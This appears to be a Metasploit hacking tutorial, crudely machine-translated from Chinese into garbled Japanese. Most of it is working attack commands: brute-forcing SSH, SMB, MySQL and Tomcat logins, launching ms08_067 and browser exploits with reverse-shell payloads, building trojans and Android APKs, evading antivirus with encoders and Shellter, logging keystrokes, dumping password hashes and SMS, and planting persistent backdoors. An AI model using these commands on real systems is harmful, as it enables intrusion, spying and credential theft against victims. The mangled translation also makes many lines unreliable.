過剰の水としてカップに注ぎ、バッファオーバフローが、以上のバッファのデータ記憶容量を提供されることを意味します。
読み書き期間として記憶領域をバッファより抽象的に理解することができる、
攻撃の究極の目標は、意図的に悪意のあるコードの設定されているこの読み書きメモリを実行するために、システムバッファが望まれます。
安全な使用して文字列操作関数
書き込みセキュリティコードの
入力データの検証(フィルタリング)
をチェックポインタの整合性
パーティのソフトウェア防衛を
侵入攻撃(エクスプロイト)
テスターは、プロセスのシステム、プログラム、またはサービスの攻撃の抜け穴を使用
攻撃負荷(ペイロード)
部分を攻撃する攻撃者のコードがターゲット・システム上で実行され、リバウンド接続を有するコードを変更し、他のシステムのコマンドの機能を実行するために、ユーザを作成します
シェルコードの
ターゲットマシン上で実行することを機械語命令の期間は、シェルの実行が成功した後に戻ります
モジュール(Module1が)
フレームMetasploitのに使用されるソフトウェア・コード・コンポーネントの部分を指し
リスナー(リスナー)
リスナー組立Metasploitのアクセスネットワーク接続を待つことです
データベース・サービスのPostgreSQL statrを開きます。
データベースの状態、サービスのPostgreSQLの状態を確認
ファイル名を指定して実行msfconsole
データベース接続の状態db_connectを見ます
テーブルワークスペース-aテストを作成します。
削除するには、テーブル作業領域 - Dテスト
テストベンチWordspaceテストを入力します。
nmapのdb_nmap -sS 192.168.80.1スキャンホストを使用します
1.xmlのdb_exportスキャン結果のエクスポート
1.xml db_import輸入スキャン結果を
スキャン結果のホストを見ます
情報収集
オープンmsfconsole
- whoisのwww.example.com
- nslookupコマンド
利用補助/スキャナ/ IP / ipidseq #IPID シーケンススキャナ、および-Si nmapの-Oオプションはに似て
表示オプション
のSETのrhosts 192.168.1.0/24
SET RPORT 8080
SETスレッド50
RUN
nmapのデータベース接続をスキャン
db_nmap -sS -A 192.168.2.123
db_servicesはスキャン結果を表示します
使用ポートスキャン模块
ポストスキャン検索
使用を補助/スキャナ/ポストスキャン/シン
設定のrhosts 192.168.1.111
セットTHREADS 50
実行
Smb_version特定の走査モジュール:
利用補助/スキャナ/ SMB / smb_version IPオープンポート445を見つける
表示オプション
のSETのrhosts 192.168.1.111
SETスレッド50
RUNの
db_hosts -cアドレス、os_flavor
找MSSQL主机
使用補助/スキャナ/ MSSQL / mssql_ping
ショーのオプションが
のrhosts 192.168.1.0/24設定し
、設定されたスレッドを255
実行
Eメールアドレス検索サイト
search_email_collectorの
利用補助/収集/ search_email_collector
SET DOMAIN cracer.com(スキャン領域)
RUN
SSHスキャンサーバの
利用補助/スキャナ/ SSH / ssh_version
のSETのrhosts 192.168.1.0/24
SETスレッド50
RUN
テルネット服务
使用補助/スキャナ/テルネット/ telnet_version
設定のrhosts 192.168.1.0/24
セットスレッド50
ラン
FTPホストスキャンは
補助/スキャナ/ FTP / ftp_version使用
表示オプション
のSETのrhostsに192.168.1.0/24
SETスレッド50
RUNを
匿名FTPログイン掃引
使用を補助/スキャナ/ FTP / anonymos
表示オプション
のSETのrhosts 192.168.1.0/24
SETスレッド50
RUN
匿名FTPログイン
ログイン名:匿名
パスワード:空
ホストが生き残ったローカル・エリア・ネットワークスキャン
arp_sweep利用補助/スキャナ/ディスカバリー/
表示オプション
のSETのrhosts 192.168.1.0/24
SETスレッド50
RUNを
スキャンウェブディレクトリ(としないスキャンファイル)
を使用補助/スキャナ/ HTTP / dir_scanner
表示オプション
のSETのrhostsに192.168.1.129
SETスレッド50
RUN
扫描SNMP主机
利用補助/スキャナ/ SNMP / snmp_login
オプションを表示は
のrhosts 192.168.1.0/24設定し
、設定されたTHREADS 50
実行を
Etherealのスニファ
利用補助/スニファ/ psnuffle
RUN
パスワードブラスト
SSH密码
ssh_login検索
使用を補助/スキャナ/ SSH / ssh_login
のオプションが表示さ
のrhosts 192.168.2.231に設定
セットPASS_FILEパス
セットUSERNAMEルートを
活用します
telnetの密码
検索telnet_loginの
/スキャナ/ telnetの/ telnet_login auxiliray使用
を示してオプションが
設定のrhosts 192.168.2.123
セットFILE_PATHパス
セットUSERNAME管理者が
利用します
サンバ攻击
使用補助/スキャナ/ SMB / smb_login
設定のrhosts 192.168.2.3
セットPASS_FILEパス
セットSMBUser管理者
セットスレッド50が
悪用
MySQLの密码爆破
mysql_login検索
使用を補助/スキャナ/ MySQLの/ mysql_login
設定のrhosts 192.168.1.32
セットPASS_FILEパス
設定USERNAMEルート
セットスレッド50が
悪用
postgresql_login検索
使用を補助/スキャナ/ postgresの/ postgres_login
ショーのオプションが
のrhosts 192.168.2.129に設定
PASS_FILEパスセット
セットUSERNAMEのはpostgres
活用を
Tomcatの攻击
tomcat_mgr_login検索
ショーのオプションが
補助/スキャナ/ HTTP / tomcat_mgr_login使用
セットが192.168.1.23のrhosts
/root/pass.txtセットPASS_FILE
/root/user.txtセットUSER_FILE
活用を
モジュールを活用
ショーのターゲットは、ターゲットを表示(OSバージョン)
目標を設定設定した目標バージョン
攻撃への脆弱性を悪用し始めました
セッション-lリストのセッション
セッションのセッションを選択します-i
セッション-kセッションの終了
背景Zでの会話
Cセッションが終了
補助ディスプレイ補助モジュールを表示
補助モジュールを使用します
設定したセットアップオプション
実行実行モジュール
ms10_002
検索ms10_002
使用悪用/ Windowsの/ブラウザ/ ms10_002_aurora
表示オプション
のSET SRVHOST 192.168.2.128(悪意のあるURL生成IP(缶プロキシ))
SETペイロードのWindows / Meterpreter / reverse_tcp(バウンスシェル)
のSET SRVPORT 80(ポートへのバウンスバック)
SET uripath /
192.168.2.128 lhost SET(アドレスのリスニング)
(リスニングポート用)SET lportは1211
エクスプロイト
セッション-i(セッションがあるかどうかを確認)
セッション-i 1(IDを選択し、セッションに入る)
を直接シェルは、シェルを得ることができる入力
ms10_018
ms10_018検索
の使用を悪用/窓/ブラウザ/ ms10_018_ie_behaviorsは
オプションを示し
SRVHOST 192.168.2.128に設定
セットSRVPORT 8081
セットのペイロード・ウィンドウ/シェル/ reverse_tcp
セットLHOST 192.168.2.128
セットlportは1211が
活用を
セッション-i(セッションがあるかどうかを確認)
セッション-i 1(選択ID、セッションに)
異なるペイロードので、直接シェルに、このように
ms12_020
検索ms12_020
補助/スキャナ/ RDB / ms12_020_check(ms12_020脆弱性のチェック)使用
の表示オプション
のSETのrhosts 192.168.2.0/24
SETスレッド50
バック
使用補助/ DOS / Windowsの/ RDP / ms12_020_maxchannelidsは
オプションが表示さ
RHOST 192.168.2.132設定
の実行を
ms10_046
ms10_046検索
の使用を悪用/窓/ブラウザ/ ms10_046_shortcut_icon_dllloader
ショーオプション
SRBHOST 192.168.2.128を設定
セットのペイロード・ウィンドウ/シェル/ reverse_tcp
セットLHOST 192.168.2.128
セットlportは1213年には、
エクスプロイト
ms08_067
ms08_067検索
の使用を悪用/窓/ SMB / ms08_067_netapiの
ショーのオプションは
RHOST 192.168.2.131に設定
セットのペイロード窓/ meterpreter / reverse_tcp
セットLHOST 192.168.2.128
セットlportは1215
ショーのターゲット
34は、設定された目標を
活用します
シェルコード
ウィンドウズ
生成shellcode
msfpaylaod windows/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 X > /root/cracer.exe
监听shellcode
msf
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.133 (地址要一致)
set LPORT 1121
将生成得shellcode上传到目标机上
exploit
Linuxの
生成shellcode
msfpayload linux/x86/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 X > /root/cracer
监听shellcode
msf
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.2.133 (地址要一致)
set LPORT 1121
将生成得shellcode上传到目标机上
exploit
Andriod
生成shellcode
msfpayload android/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 X > /root/Desktop/cracer.apk
监听shellcode
msf
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.2.133 (地址要一致)
set LPORT 1121
将生成得shellcode上传到目标机上
exploit
dump_contacts 导出电话
dump_sms 导出信息
Webcam_list 摄像头数目
-i 1 后置摄像头
webcam_snap 拍照
webcam_stream 开启摄像头
ジャワ
生成shellcode
msfpayload java/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1125 X > /root/Desktop/cracer.jar
监听shellcode
msf
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.2.133 (地址要一致)
set LPORT 1125
将生成得shellcode上传到目标机上
exploit
将生成得cracer.jar运行起来:
Java -jar cracer.jar运行起来
PHP
成shellcode
msfpayload php/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 R > cracer.php
监听shellcode
msf
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.2.133 (地址要一致)
set LPORT 1121
将生成得shellcode上传到目标机上
exploit
シェル無料殺害を避けるために殺すために
使用多重编码免杀
msfpayload windows/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1211 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /root/cc.exe
殺すために自由パッカー
UPX -5 cc.exeを
キルへの無料ベール
shellter無料ツール殺すために
注入ツールのシェルコードを
いくつかの正常なツールでは、殺すために自由を達成するために、いくつかの穴を注入しています
- まず、生成するMetasploitのペイロード
msfvenom -pのWindows / Meterpreter / reverse_tcp lhost 1337 = -e = 192.168.1.3 lportは/ 43のx86はshikata_ga_nai -i -f -o RAW fud.rawあります - ワインは、赤ワインのボトルと私たちshellterを実行shellter.exe行い、
- Aは、私たちはEXEファイルの場所を殺す避けるために、プレ噴射を実行する準備ができていることを自動モード、PEターゲットを表し
- ここでは、負荷入力L、ここで我々が使用meterpreter_reverse_tcp負荷、入力1を起動するコマンドを選択します
- 私たちのラリーシェルの場所を入力し、私たちが聞くために必要なローカルポートを入力して、ここで私は、リスニングポートとして1355を選択しました、入る直接生成
- 启动Metasploitの监听
msfconsole
使用は/マルチ/ハンドラ活用
セットペイロードの窓/ meterpreter / reverse_tcp
192.168.1.3 lhostセット
1355 lportはセットを
利用します - ファイルディレクトリを生成し、聞くために開始した後、Windowsコンピュータで実行するメインライン上に配置しました
浸透した後、
トロイの木馬作成1.
Windowsの/ Meterpreter / reverse_tcp lhost 192.168.2.133 lportは= X-1121> /root/cracer.exe msfpaylaod
2.リスニング
使用悪用/マルチ/ハンドラ
SETペイロードのWindows / Meterpreterを/ reverse_tcp
SET 192.168.2.133 lhost
SETのlportは1233年には、
エクスプロイト
ターゲットマシンの実行にトロイの木馬を
- 操作コマンド
あなたは、メインフォルダに画面キャプチャスクリーンショットの画像を生成する必要があります
プラットフォームSYSINFO実行収集システム
キーロガーを取得
開始keyscan_start
keyscan_dump出力
keyscan_stopの終わりを
psのチェック処理
1774のハンドオーバ処理を移行することは(成功の侵略は、プログラムがシャットダウンされた場合でも、制御されるように、最初は安定への切り替えのプロセスを取得することですターゲットにしました)
実行ポスト/窓/キャプチャ/ keylog_recorderレコードキーロガー
ハッシュ---- hashdumpを取得
ログのハッシュ使用して
の使用を悪用/ Windwows / SMB / PsExecは
SETペイロードwindwos / metpreter / reverse_tcp
192.168.2.133 lhost SET
SETは192.168.2.131(ターゲット)をrhost
表示オプション
SET lportは1212
SETのsmbuser管理者にこれらの値smbpass smbuser得ることができ、ハッシュ取得
SETをasdasdqwsda1313 smbpass
表示オプションを
利用します
プロセスマイグレーション実行後/窓/管理/移行 ( 自己安定化プロセスへの切り替え)
RUN killav近いCMD.EXEの
ビューの目標すべてのトラフィックラン-i 1つのpacketrecorder
抽出情報システムは、スクレーパーを実行
PC(カイからブート)の持続的な制御
RUN永続-X 50 -i -p 1121 -r 192.168.2.133(目標は、いくつかのレジストリデータを書き込むことがありました)
msfcosoleの
使用は、マルチ/ハンドラ/悪用し
、設定されたペイロードの窓/ meterpreter / reverse_tcp
セットlportは1121
セットLHOST 192.168.2.133を
悪用し
たセッション-u 2升级シェル变成meterpreterを
常設制御サーバ
msfpaylaod窓/ meterpreter / reverse_tcp LHOST = 192.168.2.133 lportは= 1127 X> /root/cracer.exe
与えるために、宛先マシン上でペイロードを生成します
msfcosoleの
使用は、マルチ/ハンドラ/悪用し
、設定されたペイロードの窓/ meterpreter / metsvc_bin_tcp
セットlportは1121
セットLHOST 192.168.2.133を
活用します
ランペイロード
metsvc -A //永続的インストールバックドアを実行します
再起動後
msfcosole
使用エクスプロイト/マルチ/ハンドラ
SETペイロードのWindows / metsvc_bind_tcp
SETは、192.168.2.132をrhost
SET lportは31337 //固定受けるポートを
利用します